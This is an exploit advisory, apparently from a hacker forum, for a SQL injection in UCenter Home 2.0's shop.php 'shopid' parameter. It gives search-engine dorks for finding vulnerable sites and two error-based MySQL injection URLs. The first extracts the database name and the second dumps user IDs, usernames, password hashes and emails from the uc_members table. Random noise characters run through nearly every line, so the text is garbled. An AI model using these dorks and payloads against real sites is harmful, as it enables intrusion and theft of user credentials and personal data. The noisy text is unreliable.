6 I- e4 d8 A5 `2 w# ?
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
- g: | e! p# q; O, P7 O; N f- O% |+ y6 N1 D% \, [
; x! k. `/ t* V. E& ~
7 m/ ~: }: |5 d% A4 \/ A*/ Author : KnocKout g- F; l' W3 @/ @; X( Y. Q
8 U p. }5 x7 f6 E: t8 C. e) Q
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers $ M8 B2 p |' w: a: X8 v
$ N# N( f2 E/ b% w8 h$ t2 `*/ Contact: knockoutr@msn.com
- i! k3 c+ j2 G7 t8 v% a. \7 @4 p( z! E
*/ Cyber-Warrior.org/CWKnocKout
0 u& q2 r% g4 z2 D4 [7 q F6 K( n, B" q" Y) W
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== - U8 U Y0 G! R# I$ @6 Z8 |0 r
; r2 t$ R V" U( CScript : UCenter Home
4 ~0 d/ p5 k4 }7 R u- I$ Y. f6 W9 ^4 F" _# E0 h
Version : 2.0
@- y, v; I) R7 ]% b5 p; b$ E- u8 n e
Script HomePage : http://u.discuz.net/ 2 K( K# V7 i3 f' a
+ g, b: m/ m& \; f8 g__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
) M5 E4 {/ m& c) N- \
9 I% S0 E) k5 @0 P s( eDork : Powered by UCenter inurl:shop.php?ac=view
5 ~, Q) ~2 ]" T
# J9 R' G1 Z ]2 ]; g9 `! @Dork 2 : inurl:shop.php?ac=view&shopid= 8 o0 P8 ^7 [ ~- l4 X0 q
8 b3 _0 K; _' J/ m
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 9 |/ c" O2 m5 m
E2 g3 |8 x4 L* g. g" P
Vuln file : Shop.php 9 l, a* r H2 l. N& j& ~5 {
! H n) V4 Z8 Vvalue's : (?)ac=view&shopid= / o7 g/ {& M4 s
0 x9 r. Z- u/ ^0 k* g% f L/ DVulnerable Style : SQL Injection (MySQL Error Based) . N7 C) a( x) L& B7 l: @7 T$ e
8 p6 I$ ]4 i! W
Need Metarials : Hex Conversion 7 U! {: t- ~* @4 ~9 ]/ h: D: b
& d! U1 b/ ~4 {3 i$ S- |
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 2 o# N0 g; E5 B* j
. r: J8 q* z" XYour Need victim Database name. 9 C! q( r: N$ M+ d+ v
# x* @ V) K( B/ b: c+ z/ h5 Qfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
; u- w8 q' N% v% T& g, @
" m q1 ^# K9 ]# j: D.. 4 Z/ p5 K* X( ]& T3 Z' ?4 x) E9 n3 T
7 p8 p: p" Z/ Q" r/ Z" x
DB : Okey.
. g/ s2 v. U G3 c$ l7 A. A J4 N) \) h) o# t% U
your edit DB `[TARGET DB NAME]` : g" ^& _6 y. x O+ G5 {6 V
4 `/ ], {+ ~6 G" s% O6 g( pExample : 'hiwir1_ucenter'
$ i& t5 f( N l1 q) _* ]8 S* t# L, A5 {; S% H1 f
Edit : Okey.
) A% L2 K4 b. f& [7 ?: g, r) i2 f
Your use Hex conversion. And edit Your SQL Injection Exploit..
5 W! l% F# ?! U, e% z
i7 b# [( R4 I6 {, | Q3 S5 F9 K1 @; R
- c) j1 K7 i0 q3 z$ |5 [
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
( w% e6 E) E8 j Y; D |